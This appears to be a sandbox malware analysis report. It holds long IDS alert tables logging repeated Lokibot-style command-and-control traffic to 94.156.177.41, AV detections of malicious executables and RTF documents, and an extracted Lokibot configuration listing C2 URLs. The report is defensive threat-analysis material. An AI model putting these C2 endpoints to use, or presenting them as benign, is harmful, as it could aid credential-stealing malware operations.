                2024-11-20T10:12:39.034887+010020243181Malware Command and Control Activity Detected192.168.2.224923694.156.177.4180TCP
                2024-11-20T10:12:40.082470+010020243181Malware Command and Control Activity Detected192.168.2.224923794.156.177.4180TCP
                2024-11-20T10:12:40.998967+010020243181Malware Command and Control Activity Detected192.168.2.224923894.156.177.4180TCP
                2024-11-20T10:12:41.926270+010020243181Malware Command and Control Activity Detected192.168.2.224923994.156.177.4180TCP
                2024-11-20T10:12:42.940058+010020243181Malware Command and Control Activity Detected192.168.2.224924094.156.177.4180TCP
                2024-11-20T10:12:43.960547+010020243181Malware Command and Control Activity Detected192.168.2.224924194.156.177.4180TCP
                2024-11-20T10:12:45.163042+010020243181Malware Command and Control Activity Detected192.168.2.224924294.156.177.4180TCP
                2024-11-20T10:12:46.061782+010020243181Malware Command and Control Activity Detected192.168.2.224924394.156.177.4180TCP
                2024-11-20T10:12:46.952281+010020243181Malware Command and Control Activity Detected192.168.2.224924494.156.177.4180TCP
                2024-11-20T10:12:48.035363+010020243181Malware Command and Control Activity Detected192.168.2.224924594.156.177.4180TCP
                2024-11-20T10:12:48.943612+010020243181Malware Command and Control Activity Detected192.168.2.224924694.156.177.4180TCP
                2024-11-20T10:12:50.033391+010020243181Malware Command and Control Activity Detected192.168.2.224924794.156.177.4180TCP
                2024-11-20T10:12:50.995621+010020243181Malware Command and Control Activity Detected192.168.2.224924894.156.177.4180TCP
                2024-11-20T10:12:51.871431+010020243181Malware Command and Control Activity Detected192.168.2.224924994.156.177.4180TCP
                2024-11-20T10:12:52.935942+010020243181Malware Command and Control Activity Detected192.168.2.224925094.156.177.4180TCP
                2024-11-20T10:12:54.054313+010020243181Malware Command and Control Activity Detected192.168.2.224925194.156.177.4180TCP
                2024-11-20T10:12:55.068247+010020243181Malware Command and Control Activity Detected192.168.2.224925294.156.177.4180TCP
                2024-11-20T10:12:55.953617+010020243181Malware Command and Control Activity Detected192.168.2.224925394.156.177.4180TCP
                2024-11-20T10:12:56.843900+010020243181Malware Command and Control Activity Detected192.168.2.224925494.156.177.4180TCP
                2024-11-20T10:12:57.763167+010020243181Malware Command and Control Activity Detected192.168.2.224925594.156.177.4180TCP
                2024-11-20T10:12:58.781339+010020243181Malware Command and Control Activity Detected192.168.2.224925694.156.177.4180TCP
                2024-11-20T10:12:59.717917+010020243181Malware Command and Control Activity Detected192.168.2.224925794.156.177.4180TCP
                2024-11-20T10:13:00.715397+010020243181Malware Command and Control Activity Detected192.168.2.224925894.156.177.4180TCP
                2024-11-20T10:13:01.604317+010020243181Malware Command and Control Activity Detected192.168.2.224925994.156.177.4180TCP
                2024-11-20T10:13:02.699741+010020243181Malware Command and Control Activity Detected192.168.2.224926094.156.177.4180TCP
                2024-11-20T10:13:03.729524+010020243181Malware Command and Control Activity Detected192.168.2.224926194.156.177.4180TCP
                2024-11-20T10:13:04.648130+010020243181Malware Command and Control Activity Detected192.168.2.224926294.156.177.4180TCP
                2024-11-20T10:13:05.554936+010020243181Malware Command and Control Activity Detected192.168.2.224926394.156.177.4180TCP
                2024-11-20T10:13:06.564082+010020243181Malware Command and Control Activity Detected192.168.2.224926494.156.177.4180TCP
                2024-11-20T10:13:07.564936+010020243181Malware Command and Control Activity Detected192.168.2.224926594.156.177.4180TCP
                2024-11-20T10:13:08.449519+010020243181Malware Command and Control Activity Detected192.168.2.224926694.156.177.4180TCP
                2024-11-20T10:13:09.331162+010020243181Malware Command and Control Activity Detected192.168.2.224926794.156.177.4180TCP
                2024-11-20T10:13:10.215842+010020243181Malware Command and Control Activity Detected192.168.2.224926894.156.177.4180TCP
                2024-11-20T10:13:11.234165+010020243181Malware Command and Control Activity Detected192.168.2.224926994.156.177.4180TCP
                2024-11-20T10:13:12.128276+010020243181Malware Command and Control Activity Detected192.168.2.224927094.156.177.4180TCP
                2024-11-20T10:13:13.149900+010020243181Malware Command and Control Activity Detected192.168.2.224927194.156.177.4180TCP
                2024-11-20T10:13:14.047995+010020243181Malware Command and Control Activity Detected192.168.2.224927294.156.177.4180TCP
                2024-11-20T10:13:14.921761+010020243181Malware Command and Control Activity Detected192.168.2.224927394.156.177.4180TCP
                2024-11-20T10:13:15.927413+010020243181Malware Command and Control Activity Detected192.168.2.224927494.156.177.4180TCP
                2024-11-20T10:13:16.829314+010020243181Malware Command and Control Activity Detected192.168.2.224927594.156.177.4180TCP
                2024-11-20T10:13:17.903807+010020243181Malware Command and Control Activity Detected192.168.2.224927694.156.177.4180TCP
                2024-11-20T10:13:18.831570+010020243181Malware Command and Control Activity Detected192.168.2.224927794.156.177.4180TCP
                2024-11-20T10:13:19.881369+010020243181Malware Command and Control Activity Detected192.168.2.224927894.156.177.4180TCP
                2024-11-20T10:13:20.786261+010020243181Malware Command and Control Activity Detected192.168.2.224927994.156.177.4180TCP
                2024-11-20T10:13:21.865363+010020243181Malware Command and Control Activity Detected192.168.2.224928094.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T10:11:34.232361+010020216411A Network Trojan was detected192.168.2.224917194.156.177.4180TCP
                2024-11-20T10:11:34.936986+010020216411A Network Trojan was detected192.168.2.224917294.156.177.4180TCP
                2024-11-20T10:11:35.753276+010020216411A Network Trojan was detected192.168.2.224917394.156.177.4180TCP
                2024-11-20T10:11:36.788420+010020216411A Network Trojan was detected192.168.2.224917494.156.177.4180TCP
                2024-11-20T10:11:37.865230+010020216411A Network Trojan was detected192.168.2.224917594.156.177.4180TCP
                2024-11-20T10:11:39.935431+010020216411A Network Trojan was detected192.168.2.224917694.156.177.4180TCP
                2024-11-20T10:11:40.804853+010020216411A Network Trojan was detected192.168.2.224917794.156.177.4180TCP
                2024-11-20T10:11:41.692875+010020216411A Network Trojan was detected192.168.2.224917894.156.177.4180TCP
                2024-11-20T10:11:42.598311+010020216411A Network Trojan was detected192.168.2.224917994.156.177.4180TCP
                2024-11-20T10:11:43.508451+010020216411A Network Trojan was detected192.168.2.224918094.156.177.4180TCP
                2024-11-20T10:11:44.410226+010020216411A Network Trojan was detected192.168.2.224918194.156.177.4180TCP
                2024-11-20T10:11:46.066976+010020216411A Network Trojan was detected192.168.2.224918294.156.177.4180TCP
                2024-11-20T10:11:47.094306+010020216411A Network Trojan was detected192.168.2.224918394.156.177.4180TCP
                2024-11-20T10:11:48.001931+010020216411A Network Trojan was detected192.168.2.224918494.156.177.4180TCP
                2024-11-20T10:11:48.916450+010020216411A Network Trojan was detected192.168.2.224918594.156.177.4180TCP
                2024-11-20T10:11:49.934221+010020216411A Network Trojan was detected192.168.2.224918694.156.177.4180TCP
                2024-11-20T10:11:50.825355+010020216411A Network Trojan was detected192.168.2.224918794.156.177.4180TCP
                2024-11-20T10:11:51.974265+010020216411A Network Trojan was detected192.168.2.224918894.156.177.4180TCP
                2024-11-20T10:11:52.833476+010020216411A Network Trojan was detected192.168.2.224918994.156.177.4180TCP
                2024-11-20T10:11:53.743942+010020216411A Network Trojan was detected192.168.2.224919094.156.177.4180TCP
                2024-11-20T10:11:54.665755+010020216411A Network Trojan was detected192.168.2.224919194.156.177.4180TCP
                2024-11-20T10:11:55.543705+010020216411A Network Trojan was detected192.168.2.224919294.156.177.4180TCP
                2024-11-20T10:11:56.465409+010020216411A Network Trojan was detected192.168.2.224919394.156.177.4180TCP
                2024-11-20T10:11:57.354850+010020216411A Network Trojan was detected192.168.2.224919494.156.177.4180TCP
                2024-11-20T10:11:58.251851+010020216411A Network Trojan was detected192.168.2.224919594.156.177.4180TCP
                2024-11-20T10:11:59.153133+010020216411A Network Trojan was detected192.168.2.224919694.156.177.4180TCP
                2024-11-20T10:12:00.062553+010020216411A Network Trojan was detected192.168.2.224919794.156.177.4180TCP
                2024-11-20T10:12:01.086240+010020216411A Network Trojan was detected192.168.2.224919894.156.177.4180TCP
                2024-11-20T10:12:02.135572+010020216411A Network Trojan was detected192.168.2.224919994.156.177.4180TCP
                2024-11-20T10:12:03.154171+010020216411A Network Trojan was detected192.168.2.224920094.156.177.4180TCP
                2024-11-20T10:12:04.183469+010020216411A Network Trojan was detected192.168.2.224920194.156.177.4180TCP
                2024-11-20T10:12:05.221730+010020216411A Network Trojan was detected192.168.2.224920294.156.177.4180TCP
                2024-11-20T10:12:06.101870+010020216411A Network Trojan was detected192.168.2.224920394.156.177.4180TCP
                2024-11-20T10:12:06.992362+010020216411A Network Trojan was detected192.168.2.224920494.156.177.4180TCP
                2024-11-20T10:12:07.878233+010020216411A Network Trojan was detected192.168.2.224920594.156.177.4180TCP
                2024-11-20T10:12:08.762365+010020216411A Network Trojan was detected192.168.2.224920694.156.177.4180TCP
                2024-11-20T10:12:09.636983+010020216411A Network Trojan was detected192.168.2.224920794.156.177.4180TCP
                2024-11-20T10:12:10.655009+010020216411A Network Trojan was detected192.168.2.224920894.156.177.4180TCP
                2024-11-20T10:12:11.548573+010020216411A Network Trojan was detected192.168.2.224920994.156.177.4180TCP
                2024-11-20T10:12:12.583479+010020216411A Network Trojan was detected192.168.2.224921094.156.177.4180TCP
                2024-11-20T10:12:13.635352+010020216411A Network Trojan was detected192.168.2.224921194.156.177.4180TCP
                2024-11-20T10:12:14.668490+010020216411A Network Trojan was detected192.168.2.224921294.156.177.4180TCP
                2024-11-20T10:12:15.692786+010020216411A Network Trojan was detected192.168.2.224921394.156.177.4180TCP
                2024-11-20T10:12:16.709953+010020216411A Network Trojan was detected192.168.2.224921494.156.177.4180TCP
                2024-11-20T10:12:17.740346+010020216411A Network Trojan was detected192.168.2.224921594.156.177.4180TCP
                2024-11-20T10:12:19.475029+010020216411A Network Trojan was detected192.168.2.224921694.156.177.4180TCP
                2024-11-20T10:12:20.388739+010020216411A Network Trojan was detected192.168.2.224921794.156.177.4180TCP
                2024-11-20T10:12:21.265845+010020216411A Network Trojan was detected192.168.2.224921894.156.177.4180TCP
                2024-11-20T10:12:22.394589+010020216411A Network Trojan was detected192.168.2.224921994.156.177.4180TCP
                2024-11-20T10:12:23.419939+010020216411A Network Trojan was detected192.168.2.224922094.156.177.4180TCP
                2024-11-20T10:12:24.307414+010020216411A Network Trojan was detected192.168.2.224922194.156.177.4180TCP
                2024-11-20T10:12:25.356968+010020216411A Network Trojan was detected192.168.2.224922294.156.177.4180TCP
                2024-11-20T10:12:26.273860+010020216411A Network Trojan was detected192.168.2.224922394.156.177.4180TCP
                2024-11-20T10:12:27.165072+010020216411A Network Trojan was detected192.168.2.224922494.156.177.4180TCP
                2024-11-20T10:12:28.110543+010020216411A Network Trojan was detected192.168.2.224922594.156.177.4180TCP
                2024-11-20T10:12:28.999728+010020216411A Network Trojan was detected192.168.2.224922694.156.177.4180TCP
                2024-11-20T10:12:29.966426+010020216411A Network Trojan was detected192.168.2.224922794.156.177.4180TCP
                2024-11-20T10:12:30.982470+010020216411A Network Trojan was detected192.168.2.224922894.156.177.4180TCP
                2024-11-20T10:12:32.023731+010020216411A Network Trojan was detected192.168.2.224922994.156.177.4180TCP
                2024-11-20T10:12:32.972572+010020216411A Network Trojan was detected192.168.2.224923094.156.177.4180TCP
                2024-11-20T10:12:33.892076+010020216411A Network Trojan was detected192.168.2.224923194.156.177.4180TCP
                2024-11-20T10:12:34.777104+010020216411A Network Trojan was detected192.168.2.224923294.156.177.4180TCP
                2024-11-20T10:12:35.645216+010020216411A Network Trojan was detected192.168.2.224923394.156.177.4180TCP
                2024-11-20T10:12:36.520686+010020216411A Network Trojan was detected192.168.2.224923494.156.177.4180TCP
                2024-11-20T10:12:37.391332+010020216411A Network Trojan was detected192.168.2.224923594.156.177.4180TCP
                2024-11-20T10:12:38.295670+010020216411A Network Trojan was detected192.168.2.224923694.156.177.4180TCP
                2024-11-20T10:12:39.189869+010020216411A Network Trojan was detected192.168.2.224923794.156.177.4180TCP
                2024-11-20T10:12:40.238221+010020216411A Network Trojan was detected192.168.2.224923894.156.177.4180TCP
                2024-11-20T10:12:41.149834+010020216411A Network Trojan was detected192.168.2.224923994.156.177.4180TCP
                2024-11-20T10:12:42.075089+010020216411A Network Trojan was detected192.168.2.224924094.156.177.4180TCP
                2024-11-20T10:12:43.090775+010020216411A Network Trojan was detected192.168.2.224924194.156.177.4180TCP
                2024-11-20T10:12:44.335023+010020216411A Network Trojan was detected192.168.2.224924294.156.177.4180TCP
                2024-11-20T10:12:45.306056+010020216411A Network Trojan was detected192.168.2.224924394.156.177.4180TCP
                2024-11-20T10:12:46.228751+010020216411A Network Trojan was detected192.168.2.224924494.156.177.4180TCP
                2024-11-20T10:12:47.301018+010020216411A Network Trojan was detected192.168.2.224924594.156.177.4180TCP
                2024-11-20T10:12:48.198489+010020216411A Network Trojan was detected192.168.2.224924694.156.177.4180TCP
                2024-11-20T10:12:49.104815+010020216411A Network Trojan was detected192.168.2.224924794.156.177.4180TCP
                2024-11-20T10:12:50.259999+010020216411A Network Trojan was detected192.168.2.224924894.156.177.4180TCP
                2024-11-20T10:12:51.135098+010020216411A Network Trojan was detected192.168.2.224924994.156.177.4180TCP
                2024-11-20T10:12:52.064243+010020216411A Network Trojan was detected192.168.2.224925094.156.177.4180TCP
                2024-11-20T10:12:53.190103+010020216411A Network Trojan was detected192.168.2.224925194.156.177.4180TCP
                2024-11-20T10:12:54.198386+010020216411A Network Trojan was detected192.168.2.224925294.156.177.4180TCP
                2024-11-20T10:12:55.205372+010020216411A Network Trojan was detected192.168.2.224925394.156.177.4180TCP
                2024-11-20T10:12:56.120814+010020216411A Network Trojan was detected192.168.2.224925494.156.177.4180TCP
                2024-11-20T10:12:57.001731+010020216411A Network Trojan was detected192.168.2.224925594.156.177.4180TCP
                2024-11-20T10:12:57.910682+010020216411A Network Trojan was detected192.168.2.224925694.156.177.4180TCP
                2024-11-20T10:12:58.994068+010020216411A Network Trojan was detected192.168.2.224925794.156.177.4180TCP
                2024-11-20T10:12:59.856695+010020216411A Network Trojan was detected192.168.2.224925894.156.177.4180TCP
                2024-11-20T10:13:00.859620+010020216411A Network Trojan was detected192.168.2.224925994.156.177.4180TCP
                2024-11-20T10:13:01.807106+010020216411A Network Trojan was detected192.168.2.224926094.156.177.4180TCP
                2024-11-20T10:13:02.864990+010020216411A Network Trojan was detected192.168.2.224926194.156.177.4180TCP
                2024-11-20T10:13:03.882271+010020216411A Network Trojan was detected192.168.2.224926294.156.177.4180TCP
                2024-11-20T10:13:04.788703+010020216411A Network Trojan was detected192.168.2.224926394.156.177.4180TCP
                2024-11-20T10:13:05.710359+010020216411A Network Trojan was detected192.168.2.224926494.156.177.4180TCP
                2024-11-20T10:13:06.715979+010020216411A Network Trojan was detected192.168.2.224926594.156.177.4180TCP
                2024-11-20T10:13:07.728341+010020216411A Network Trojan was detected192.168.2.224926694.156.177.4180TCP
                2024-11-20T10:13:08.595686+010020216411A Network Trojan was detected192.168.2.224926794.156.177.4180TCP
                2024-11-20T10:13:09.484579+010020216411A Network Trojan was detected192.168.2.224926894.156.177.4180TCP
                2024-11-20T10:13:10.364041+010020216411A Network Trojan was detected192.168.2.224926994.156.177.4180TCP
                2024-11-20T10:13:11.382963+010020216411A Network Trojan was detected192.168.2.224927094.156.177.4180TCP
                2024-11-20T10:13:12.272453+010020216411A Network Trojan was detected192.168.2.224927194.156.177.4180TCP
                2024-11-20T10:13:13.292586+010020216411A Network Trojan was detected192.168.2.224927294.156.177.4180TCP
                2024-11-20T10:13:14.191871+010020216411A Network Trojan was detected192.168.2.224927394.156.177.4180TCP
                2024-11-20T10:13:15.065941+010020216411A Network Trojan was detected192.168.2.224927494.156.177.4180TCP
                2024-11-20T10:13:16.079240+010020216411A Network Trojan was detected192.168.2.224927594.156.177.4180TCP
                2024-11-20T10:13:17.017320+010020216411A Network Trojan was detected192.168.2.224927694.156.177.4180TCP
                2024-11-20T10:13:18.056702+010020216411A Network Trojan was detected192.168.2.224927794.156.177.4180TCP
                2024-11-20T10:13:18.985728+010020216411A Network Trojan was detected192.168.2.224927894.156.177.4180TCP
                2024-11-20T10:13:20.030600+010020216411A Network Trojan was detected192.168.2.224927994.156.177.4180TCP
                2024-11-20T10:13:21.135705+010020216411A Network Trojan was detected192.168.2.224928094.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T10:11:34.232361+010028257661Malware Command and Control Activity Detected192.168.2.224917194.156.177.4180TCP
                2024-11-20T10:11:34.936986+010028257661Malware Command and Control Activity Detected192.168.2.224917294.156.177.4180TCP
                2024-11-20T10:11:35.753276+010028257661Malware Command and Control Activity Detected192.168.2.224917394.156.177.4180TCP
                2024-11-20T10:11:36.788420+010028257661Malware Command and Control Activity Detected192.168.2.224917494.156.177.4180TCP
                2024-11-20T10:11:37.865230+010028257661Malware Command and Control Activity Detected192.168.2.224917594.156.177.4180TCP
                2024-11-20T10:11:39.935431+010028257661Malware Command and Control Activity Detected192.168.2.224917694.156.177.4180TCP
                2024-11-20T10:11:40.804853+010028257661Malware Command and Control Activity Detected192.168.2.224917794.156.177.4180TCP
                2024-11-20T10:11:41.692875+010028257661Malware Command and Control Activity Detected192.168.2.224917894.156.177.4180TCP
                2024-11-20T10:11:42.598311+010028257661Malware Command and Control Activity Detected192.168.2.224917994.156.177.4180TCP
                2024-11-20T10:11:43.508451+010028257661Malware Command and Control Activity Detected192.168.2.224918094.156.177.4180TCP
                2024-11-20T10:11:44.410226+010028257661Malware Command and Control Activity Detected192.168.2.224918194.156.177.4180TCP
                2024-11-20T10:11:46.066976+010028257661Malware Command and Control Activity Detected192.168.2.224918294.156.177.4180TCP
                2024-11-20T10:11:47.094306+010028257661Malware Command and Control Activity Detected192.168.2.224918394.156.177.4180TCP
                2024-11-20T10:11:48.001931+010028257661Malware Command and Control Activity Detected192.168.2.224918494.156.177.4180TCP
                2024-11-20T10:11:48.916450+010028257661Malware Command and Control Activity Detected192.168.2.224918594.156.177.4180TCP
                2024-11-20T10:11:49.934221+010028257661Malware Command and Control Activity Detected192.168.2.224918694.156.177.4180TCP
                2024-11-20T10:11:50.825355+010028257661Malware Command and Control Activity Detected192.168.2.224918794.156.177.4180TCP
                2024-11-20T10:11:51.974265+010028257661Malware Command and Control Activity Detected192.168.2.224918894.156.177.4180TCP
                2024-11-20T10:11:52.833476+010028257661Malware Command and Control Activity Detected192.168.2.224918994.156.177.4180TCP
                2024-11-20T10:11:53.743942+010028257661Malware Command and Control Activity Detected192.168.2.224919094.156.177.4180TCP
                2024-11-20T10:11:54.665755+010028257661Malware Command and Control Activity Detected192.168.2.224919194.156.177.4180TCP
                2024-11-20T10:11:55.543705+010028257661Malware Command and Control Activity Detected192.168.2.224919294.156.177.4180TCP
                2024-11-20T10:11:56.465409+010028257661Malware Command and Control Activity Detected192.168.2.224919394.156.177.4180TCP
                2024-11-20T10:11:57.354850+010028257661Malware Command and Control Activity Detected192.168.2.224919494.156.177.4180TCP
                2024-11-20T10:11:58.251851+010028257661Malware Command and Control Activity Detected192.168.2.224919594.156.177.4180TCP
                2024-11-20T10:11:59.153133+010028257661Malware Command and Control Activity Detected192.168.2.224919694.156.177.4180TCP
                2024-11-20T10:12:00.062553+010028257661Malware Command and Control Activity Detected192.168.2.224919794.156.177.4180TCP
                2024-11-20T10:12:01.086240+010028257661Malware Command and Control Activity Detected192.168.2.224919894.156.177.4180TCP
                2024-11-20T10:12:02.135572+010028257661Malware Command and Control Activity Detected192.168.2.224919994.156.177.4180TCP
                2024-11-20T10:12:03.154171+010028257661Malware Command and Control Activity Detected192.168.2.224920094.156.177.4180TCP
                2024-11-20T10:12:04.183469+010028257661Malware Command and Control Activity Detected192.168.2.224920194.156.177.4180TCP
                2024-11-20T10:12:05.221730+010028257661Malware Command and Control Activity Detected192.168.2.224920294.156.177.4180TCP
                2024-11-20T10:12:06.101870+010028257661Malware Command and Control Activity Detected192.168.2.224920394.156.177.4180TCP
                2024-11-20T10:12:06.992362+010028257661Malware Command and Control Activity Detected192.168.2.224920494.156.177.4180TCP
                2024-11-20T10:12:07.878233+010028257661Malware Command and Control Activity Detected192.168.2.224920594.156.177.4180TCP
                2024-11-20T10:12:08.762365+010028257661Malware Command and Control Activity Detected192.168.2.224920694.156.177.4180TCP
                2024-11-20T10:12:09.636983+010028257661Malware Command and Control Activity Detected192.168.2.224920794.156.177.4180TCP
                2024-11-20T10:12:10.655009+010028257661Malware Command and Control Activity Detected192.168.2.224920894.156.177.4180TCP
                2024-11-20T10:12:11.548573+010028257661Malware Command and Control Activity Detected192.168.2.224920994.156.177.4180TCP
                2024-11-20T10:12:12.583479+010028257661Malware Command and Control Activity Detected192.168.2.224921094.156.177.4180TCP
                2024-11-20T10:12:13.635352+010028257661Malware Command and Control Activity Detected192.168.2.224921194.156.177.4180TCP
                2024-11-20T10:12:14.668490+010028257661Malware Command and Control Activity Detected192.168.2.224921294.156.177.4180TCP
                2024-11-20T10:12:15.692786+010028257661Malware Command and Control Activity Detected192.168.2.224921394.156.177.4180TCP
                2024-11-20T10:12:16.709953+010028257661Malware Command and Control Activity Detected192.168.2.224921494.156.177.4180TCP
                2024-11-20T10:12:17.740346+010028257661Malware Command and Control Activity Detected192.168.2.224921594.156.177.4180TCP
                2024-11-20T10:12:19.475029+010028257661Malware Command and Control Activity Detected192.168.2.224921694.156.177.4180TCP
                2024-11-20T10:12:20.388739+010028257661Malware Command and Control Activity Detected192.168.2.224921794.156.177.4180TCP
                2024-11-20T10:12:21.265845+010028257661Malware Command and Control Activity Detected192.168.2.224921894.156.177.4180TCP
                2024-11-20T10:12:22.394589+010028257661Malware Command and Control Activity Detected192.168.2.224921994.156.177.4180TCP
                2024-11-20T10:12:23.419939+010028257661Malware Command and Control Activity Detected192.168.2.224922094.156.177.4180TCP
                2024-11-20T10:12:24.307414+010028257661Malware Command and Control Activity Detected192.168.2.224922194.156.177.4180TCP
                2024-11-20T10:12:25.356968+010028257661Malware Command and Control Activity Detected192.168.2.224922294.156.177.4180TCP
                2024-11-20T10:12:26.273860+010028257661Malware Command and Control Activity Detected192.168.2.224922394.156.177.4180TCP
                2024-11-20T10:12:27.165072+010028257661Malware Command and Control Activity Detected192.168.2.224922494.156.177.4180TCP
                2024-11-20T10:12:28.110543+010028257661Malware Command and Control Activity Detected192.168.2.224922594.156.177.4180TCP
                2024-11-20T10:12:28.999728+010028257661Malware Command and Control Activity Detected192.168.2.224922694.156.177.4180TCP
                2024-11-20T10:12:29.966426+010028257661Malware Command and Control Activity Detected192.168.2.224922794.156.177.4180TCP
                2024-11-20T10:12:30.982470+010028257661Malware Command and Control Activity Detected192.168.2.224922894.156.177.4180TCP
                2024-11-20T10:12:32.023731+010028257661Malware Command and Control Activity Detected192.168.2.224922994.156.177.4180TCP
                2024-11-20T10:12:32.972572+010028257661Malware Command and Control Activity Detected192.168.2.224923094.156.177.4180TCP
                2024-11-20T10:12:33.892076+010028257661Malware Command and Control Activity Detected192.168.2.224923194.156.177.4180TCP
                2024-11-20T10:12:34.777104+010028257661Malware Command and Control Activity Detected192.168.2.224923294.156.177.4180TCP
                2024-11-20T10:12:35.645216+010028257661Malware Command and Control Activity Detected192.168.2.224923394.156.177.4180TCP
                2024-11-20T10:12:36.520686+010028257661Malware Command and Control Activity Detected192.168.2.224923494.156.177.4180TCP
                2024-11-20T10:12:37.391332+010028257661Malware Command and Control Activity Detected192.168.2.224923594.156.177.4180TCP
                2024-11-20T10:12:38.295670+010028257661Malware Command and Control Activity Detected192.168.2.224923694.156.177.4180TCP
                2024-11-20T10:12:39.189869+010028257661Malware Command and Control Activity Detected192.168.2.224923794.156.177.4180TCP
                2024-11-20T10:12:40.238221+010028257661Malware Command and Control Activity Detected192.168.2.224923894.156.177.4180TCP
                2024-11-20T10:12:41.149834+010028257661Malware Command and Control Activity Detected192.168.2.224923994.156.177.4180TCP
                2024-11-20T10:12:42.075089+010028257661Malware Command and Control Activity Detected192.168.2.224924094.156.177.4180TCP
                2024-11-20T10:12:43.090775+010028257661Malware Command and Control Activity Detected192.168.2.224924194.156.177.4180TCP
                2024-11-20T10:12:44.335023+010028257661Malware Command and Control Activity Detected192.168.2.224924294.156.177.4180TCP
                2024-11-20T10:12:45.306056+010028257661Malware Command and Control Activity Detected192.168.2.224924394.156.177.4180TCP
                2024-11-20T10:12:46.228751+010028257661Malware Command and Control Activity Detected192.168.2.224924494.156.177.4180TCP
                2024-11-20T10:12:47.301018+010028257661Malware Command and Control Activity Detected192.168.2.224924594.156.177.4180TCP
                2024-11-20T10:12:48.198489+010028257661Malware Command and Control Activity Detected192.168.2.224924694.156.177.4180TCP
                2024-11-20T10:12:49.104815+010028257661Malware Command and Control Activity Detected192.168.2.224924794.156.177.4180TCP
                2024-11-20T10:12:50.259999+010028257661Malware Command and Control Activity Detected192.168.2.224924894.156.177.4180TCP
                2024-11-20T10:12:51.135098+010028257661Malware Command and Control Activity Detected192.168.2.224924994.156.177.4180TCP
                2024-11-20T10:12:52.064243+010028257661Malware Command and Control Activity Detected192.168.2.224925094.156.177.4180TCP
                2024-11-20T10:12:53.190103+010028257661Malware Command and Control Activity Detected192.168.2.224925194.156.177.4180TCP
                2024-11-20T10:12:54.198386+010028257661Malware Command and Control Activity Detected192.168.2.224925294.156.177.4180TCP
                2024-11-20T10:12:55.205372+010028257661Malware Command and Control Activity Detected192.168.2.224925394.156.177.4180TCP
                2024-11-20T10:12:56.120814+010028257661Malware Command and Control Activity Detected192.168.2.224925494.156.177.4180TCP
                2024-11-20T10:12:57.001731+010028257661Malware Command and Control Activity Detected192.168.2.224925594.156.177.4180TCP
                2024-11-20T10:12:57.910682+010028257661Malware Command and Control Activity Detected192.168.2.224925694.156.177.4180TCP
                2024-11-20T10:12:58.994068+010028257661Malware Command and Control Activity Detected192.168.2.224925794.156.177.4180TCP
                2024-11-20T10:12:59.856695+010028257661Malware Command and Control Activity Detected192.168.2.224925894.156.177.4180TCP
                2024-11-20T10:13:00.859620+010028257661Malware Command and Control Activity Detected192.168.2.224925994.156.177.4180TCP
                2024-11-20T10:13:01.807106+010028257661Malware Command and Control Activity Detected192.168.2.224926094.156.177.4180TCP
                2024-11-20T10:13:02.864990+010028257661Malware Command and Control Activity Detected192.168.2.224926194.156.177.4180TCP
                2024-11-20T10:13:03.882271+010028257661Malware Command and Control Activity Detected192.168.2.224926294.156.177.4180TCP
                2024-11-20T10:13:04.788703+010028257661Malware Command and Control Activity Detected192.168.2.224926394.156.177.4180TCP
                2024-11-20T10:13:05.710359+010028257661Malware Command and Control Activity Detected192.168.2.224926494.156.177.4180TCP
                2024-11-20T10:13:06.715979+010028257661Malware Command and Control Activity Detected192.168.2.224926594.156.177.4180TCP
                2024-11-20T10:13:07.728341+010028257661Malware Command and Control Activity Detected192.168.2.224926694.156.177.4180TCP
                2024-11-20T10:13:08.595686+010028257661Malware Command and Control Activity Detected192.168.2.224926794.156.177.4180TCP
                2024-11-20T10:13:09.484579+010028257661Malware Command and Control Activity Detected192.168.2.224926894.156.177.4180TCP
                2024-11-20T10:13:10.364041+010028257661Malware Command and Control Activity Detected192.168.2.224926994.156.177.4180TCP
                2024-11-20T10:13:11.382963+010028257661Malware Command and Control Activity Detected192.168.2.224927094.156.177.4180TCP
                2024-11-20T10:13:12.272453+010028257661Malware Command and Control Activity Detected192.168.2.224927194.156.177.4180TCP
                2024-11-20T10:13:13.292586+010028257661Malware Command and Control Activity Detected192.168.2.224927294.156.177.4180TCP
                2024-11-20T10:13:14.191871+010028257661Malware Command and Control Activity Detected192.168.2.224927394.156.177.4180TCP
                2024-11-20T10:13:15.065941+010028257661Malware Command and Control Activity Detected192.168.2.224927494.156.177.4180TCP
                2024-11-20T10:13:16.079240+010028257661Malware Command and Control Activity Detected192.168.2.224927594.156.177.4180TCP
                2024-11-20T10:13:17.017320+010028257661Malware Command and Control Activity Detected192.168.2.224927694.156.177.4180TCP
                2024-11-20T10:13:18.056702+010028257661Malware Command and Control Activity Detected192.168.2.224927794.156.177.4180TCP
                2024-11-20T10:13:18.985728+010028257661Malware Command and Control Activity Detected192.168.2.224927894.156.177.4180TCP
                2024-11-20T10:13:20.030600+010028257661Malware Command and Control Activity Detected192.168.2.224927994.156.177.4180TCP
                2024-11-20T10:13:21.135705+010028257661Malware Command and Control Activity Detected192.168.2.224928094.156.177.4180TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://94.156.177.41/maxzi/five/fre.phpAvira URL Cloud: Label: malware
                Source: 94.156.177.41/maxzi/five/fre.phpAvira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Roaming\wininit.exeAvira: detection malicious, Label: HEUR/AGEN.1306899
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exeAvira: detection malicious, Label: HEUR/AGEN.1306899
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18F2865F.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
                Source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/maxzi/five/fre.php"]}
                Source: C:\Users\user\AppData\Roaming\wininit.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exeJoe Sandbox ML: detected

                Exploits

                barindex
